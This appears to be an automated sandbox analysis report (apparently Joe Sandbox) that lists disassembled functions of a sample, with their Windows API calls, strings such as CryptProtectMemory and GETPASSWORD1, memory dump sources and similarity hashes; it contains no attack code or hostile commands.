Function 008E75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008E7573,00000000,?,008E7513,00000000,008FBAD8,0000000C,008E766A,00000000,00000002), ref: 008E75E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008E75F5
FreeLibrary.KERNEL32(00000000,?,?,?,008E7573,00000000,?,008E7513,00000000,008FBAD8,0000000C,008E766A,00000000,00000002), ref: 008E7618

Strings

CorExitProcess, xrefs: 008E75ED
mscoree.dll, xrefs: 008E75DB

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 77a09676bf76daa0bfd7751a49c664ba09ec13e1a55d84061f246528811228b4
Instruction ID: 8161f1305b5e782905c7e5d7279416f2fbab6c0f0abaa6337928241d60e32294
Opcode Fuzzy Hash: 77a09676bf76daa0bfd7751a49c664ba09ec13e1a55d84061f246528811228b4
Instruction Fuzzy Hash: 10F0813061460CBBCB119BA5DC09EADBBB8FB04716F100059F805E6260EF348A40CA50

Function 008CEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 008D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008D00A0
Part of subcall function 008D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008CEB86,Crypt32.dll,00000000,008CEC0A,?,?,008CEBEC,?,?,?), ref: 008D00C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008CEB92
GetProcAddress.KERNEL32(009081C0,CryptUnprotectMemory), ref: 008CEBA2

Strings

CryptUnprotectMemory, xrefs: 008CEB98
CryptProtectMemory, xrefs: 008CEB8C
Crypt32.dll, xrefs: 008CEB7C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 23bb743a6dbaa5966d204459ca5a9ddc178ce6cec6fbdc091284cc82d838ba5b
Instruction ID: 81cd934e5243d9f7df2b4e4db81aeb5d6398b5da6ccdec5943923b8cbb767738
Opcode Fuzzy Hash: 23bb743a6dbaa5966d204459ca5a9ddc178ce6cec6fbdc091284cc82d838ba5b
Instruction Fuzzy Hash: 9FE04F70500B41AECB309F389809F62BEE4FB15710F10C81EE5E6E3240DAF8D9408B60

Function 008E7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008E7E4B
_free.LIBCMT ref: 008E7E6B

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4e1dfd57ca96186dde61932eedfa3f1dffe8fad65c1bbc17d6a83e9116ec649a
Instruction ID: a210ef56c94ba1f5b163cdb8d4ed543e6fbc79e1a279e0aa3b2d39b4ca97e327
Opcode Fuzzy Hash: 4e1dfd57ca96186dde61932eedfa3f1dffe8fad65c1bbc17d6a83e9116ec649a
Instruction Fuzzy Hash: 5641E132A003049FDB24DF79C881A6EB7B5FF8A714F1545A9E515EB391EB31AD01CB81

Function 008EB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 008EB619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008EB63C

Part of subcall function 008E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008EC13D,00000000,?,008E67E2,?,00000008,?,008E89AD,?,?,?), ref: 008E854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008EB662
_free.LIBCMT ref: 008EB675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008EB684

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: bba6ea047a0d887d2f58635cc9a8694b46f07dfde478ba33546eb9747ada960b
Instruction ID: e77e0e02d16faa35c6774f4521cebdd3d21869e58f4ab012aa44063d7744735c
Opcode Fuzzy Hash: bba6ea047a0d887d2f58635cc9a8694b46f07dfde478ba33546eb9747ada960b
Instruction Fuzzy Hash: CE0171B26016A5BB6321167B6C88C7B6A6DFED7BA13150229BD04D2160DF60CD01D5B1

Function 008E9029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00900EE8,00000200,008E895F,008E58FE,?,?,?,?,008CD25E,?,02D90258,00000063,00000004,008CCFE0,?), ref: 008E902E
_free.LIBCMT ref: 008E9063
_free.LIBCMT ref: 008E908A
SetLastError.KERNEL32(00000000,008F3958,00000050,00900EE8), ref: 008E9097
SetLastError.KERNEL32(00000000,008F3958,00000050,00900EE8), ref: 008E90A0

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 653fd9cd65a78bceb7da130da7a067910f75cd3ce7bb7022c95a9029325b8d18
Instruction ID: 47cfaa28e9d1919826cc19477c5af17f06de1277110cfa7c4aae40f82932fceb
Opcode Fuzzy Hash: 653fd9cd65a78bceb7da130da7a067910f75cd3ce7bb7022c95a9029325b8d18
Instruction Fuzzy Hash: D901F472505E80AB8332677B6C85D3B262DFBE37753600025F959D21A2EEA4CC018166

Function 008D075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 008D0A41: ResetEvent.KERNEL32(?), ref: 008D0A53
Part of subcall function 008D0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008D0A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 008D078F
CloseHandle.KERNEL32(?,?), ref: 008D07A9
DeleteCriticalSection.KERNEL32(?), ref: 008D07C2
CloseHandle.KERNEL32(?), ref: 008D07CE
CloseHandle.KERNEL32(?), ref: 008D07DA

Part of subcall function 008D084E: WaitForSingleObject.KERNEL32(?,000000FF,008D0A78,?), ref: 008D0854
Part of subcall function 008D084E: GetLastError.KERNEL32(?), ref: 008D0860

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 71a434aa8e3cb440b683290e4502e1d04826955ee3a900943fbbbd2c355c513d
Instruction ID: 28d84839656f7d9e6fc56c7e4887ca4ae5ad9b4eaa8d36f89c7d6ea2f26f12cc
Opcode Fuzzy Hash: 71a434aa8e3cb440b683290e4502e1d04826955ee3a900943fbbbd2c355c513d
Instruction Fuzzy Hash: AF015271544B04EBC7229B69DD84F96BBE9FB89710F00052AF15E82260CF766A44DF90

Function 008EBF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008EBF28

Part of subcall function 008E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958), ref: 008E84F4
Part of subcall function 008E84DE: GetLastError.KERNEL32(008F3958,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958,008F3958), ref: 008E8506

_free.LIBCMT ref: 008EBF3A
_free.LIBCMT ref: 008EBF4C
_free.LIBCMT ref: 008EBF5E
_free.LIBCMT ref: 008EBF70

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bdc4aef2f83ff7e3a1af65236077a3982e151b63e178ede00ed366ed6ace970c
Instruction ID: c70c8ed1a62aeb8406b155c544de8449aa21f8b4a13167208c474eee15a83f6f
Opcode Fuzzy Hash: bdc4aef2f83ff7e3a1af65236077a3982e151b63e178ede00ed366ed6ace970c
Instruction Fuzzy Hash: FDF01232505695E78620EB6EFE86C2B73D9FA027147644845F40CD7DA0CF30FC808E55

Function 008E8060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008E807E

Part of subcall function 008E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958), ref: 008E84F4
Part of subcall function 008E84DE: GetLastError.KERNEL32(008F3958,?,008EBFA7,008F3958,00000000,008F3958,00000000,?,008EBFCE,008F3958,00000007,008F3958,?,008EC3CB,008F3958,008F3958), ref: 008E8506

_free.LIBCMT ref: 008E8090
_free.LIBCMT ref: 008E80A3
_free.LIBCMT ref: 008E80B4
_free.LIBCMT ref: 008E80C5

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 53fe380c924880a850a1d87c9e659929548b9cd4131fda5a50b3fc41923643fc
Instruction ID: 68ba424556f27151ec0431abb6ca0e6c513fccc087aff10f0c7f5837f3403ec8
Opcode Fuzzy Hash: 53fe380c924880a850a1d87c9e659929548b9cd4131fda5a50b3fc41923643fc
Instruction Fuzzy Hash: CDF03A74829969CB87617F2ABC0181D3B66F726720309465AF418D7EB0CB310873AFD6

Function 008C7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008C7579

Part of subcall function 008C3B3D: __EH_prolog.LIBCMT ref: 008C3B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008C7640

Part of subcall function 008C7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 008C7C04
Part of subcall function 008C7BF5: GetLastError.KERNEL32 ref: 008C7C4A
Part of subcall function 008C7BF5: CloseHandle.KERNEL32(?), ref: 008C7C59

Strings

SeSecurityPrivilege, xrefs: 008C75BE
SeRestorePrivilege, xrefs: 008C75D3

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: ff9fb5ac879da2116537edc7b534b543d5cec9596cf5202cb60e1d02c36bd4d6
Instruction ID: 89193045c5d999c301689a3a23884cac5e7ca50254cb656a3eb5bf6677bd7f94
Opcode Fuzzy Hash: ff9fb5ac879da2116537edc7b534b543d5cec9596cf5202cb60e1d02c36bd4d6
Instruction Fuzzy Hash: 63319C71908208AEDF20EB68DC46FEE7BB9FB55314F00416AF544E6242DB708A44CB62

Function 008DA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 008C130B: GetDlgItem.USER32(00000000,00003021), ref: 008C134F
Part of subcall function 008C130B: SetWindowTextW.USER32(00000000,008F35B4), ref: 008C1365

EndDialog.USER32(?,00000001), ref: 008DA4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 008DA4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 008DA4E2

Strings

ASKNEXTVOL, xrefs: 008DA448

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: ae6d56288f2ba31f8046e9aa0b3c276b45474fee6977ff52d77050c50600574e
Instruction ID: 6a6e0fe1493a909ca702d8d04af37444f1c67efbc0a5ebd1d3363072ffa92881
Opcode Fuzzy Hash: ae6d56288f2ba31f8046e9aa0b3c276b45474fee6977ff52d77050c50600574e
Instruction Fuzzy Hash: AD119332258204BFDA359F68DC4DF66376AFB8A704F204216F241D72A1C7A19906E72B

Function 008CD1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 008CD22E
_strncpy.LIBCMT ref: 008CD278

Strings

@%s, xrefs: 008CD218
$%s, xrefs: 008CD223

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 12f7b858d799237427315cda202ca7a339ee8b3291f015a3717625264a708e3b
Instruction ID: 922e0100e44cb616c70fac62c6123d8dcd8264bc93f5231a6b4c04c3226cd7f0
Opcode Fuzzy Hash: 12f7b858d799237427315cda202ca7a339ee8b3291f015a3717625264a708e3b
Instruction Fuzzy Hash: 4C216F7254034CABDB21EEA4CC06FEE7BB8FF05300F04052AFA15D6192E375EA559B51

Function 008DA990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 008C130B: GetDlgItem.USER32(00000000,00003021), ref: 008C134F
Part of subcall function 008C130B: SetWindowTextW.USER32(00000000,008F35B4), ref: 008C1365

EndDialog.USER32(?,00000001), ref: 008DA9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 008DA9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 008DAA24

Strings

GETPASSWORD1, xrefs: 008DA9A9

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 7147064dc1acdc935101e0c05f726c6e0f467229a157be92d91ff85e65313024
Instruction ID: e06cf6fa2b454d6a95c95efe5a93a8a9d3c5d4d3a72a5a87b008f2b08de822a6
Opcode Fuzzy Hash: 7147064dc1acdc935101e0c05f726c6e0f467229a157be92d91ff85e65313024
Instruction Fuzzy Hash: 1F1121329941287ADB359A689D49FFA3B7CFB0A700F100222FA45E2281C2719951E662

Function 008CB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008CB51E

Part of subcall function 008C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008C401D

_wcschr.LIBVCRUNTIME ref: 008CB53C
_wcschr.LIBVCRUNTIME ref: 008CB54C

Strings

%c:\, xrefs: 008CB514

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: b9f537f0c5e7d6e24830e546d5e45de5ab13f5a84f7078d541b6fafcb08cd2df
Instruction ID: c2725bb03f98628afe20feb324e9a1fc2f749c4acef59bdb5d440aeed6d70572
Opcode Fuzzy Hash: b9f537f0c5e7d6e24830e546d5e45de5ab13f5a84f7078d541b6fafcb08cd2df
Instruction Fuzzy Hash: 2A012163614B1176CB205B799C47E2BB7BCFE963A0F50441EF945D7141FB30D940C2A2

Function 008D06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,008CABC5,00000008,?,00000000,?,008CCB88,?,00000000), ref: 008D06F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,008CABC5,00000008,?,00000000,?,008CCB88,?,00000000), ref: 008D06FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,008CABC5,00000008,?,00000000,?,008CCB88,?,00000000), ref: 008D070D

Strings

Thread pool initialization failed., xrefs: 008D0725

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 4daf9596af1684f88a6a45748c6d1f5cfb5fccddc6c1ceb54b82a1e81d0e0df8
Instruction ID: 6b11e99764782b03beab0d5d8cc35fad27ad529cf7d15578ff7d6a46a7165cea
Opcode Fuzzy Hash: 4daf9596af1684f88a6a45748c6d1f5cfb5fccddc6c1ceb54b82a1e81d0e0df8
Instruction Fuzzy Hash: 14114FB1504709AFC3215F759884AA7FBECFB95755F10492FF2DAC6200DA71A980CB50

Function 008DD38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 008DD3DE
REPLACEFILEDLG, xrefs: 008DD3C9, 008DD3FD

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2010002805.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010195738.00000000008F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000904000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010210664.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2010252092.0000000000922000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_QoRXFaE8Xn.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 6f066ee45ba23a2ab0de6ce6947084a9daa002fcdb81b953c1402dbd11caddab
Instruction ID: 2c71670d8238ed2c7d6c8ab9a197bb7739d68f61a14be24d772dca6781f55f06
Opcode Fuzzy Hash: 6f066ee45ba23a2ab0de6ce6947084a9daa002fcdb81b953c1402dbd11caddab
Instruction Fuzzy Hash: B501BC71A28349AFCB118F68EC44EA73BAAF708394F004523F945D2370DA719850FBA1

Function 008E91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008E9269
__alldvrm.LIBCMT ref: 008E946A
__alldvrm.LIBCMT ref: 008E948C

Memory Dump Source

Source File: 00000000.00000002.2010148426.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

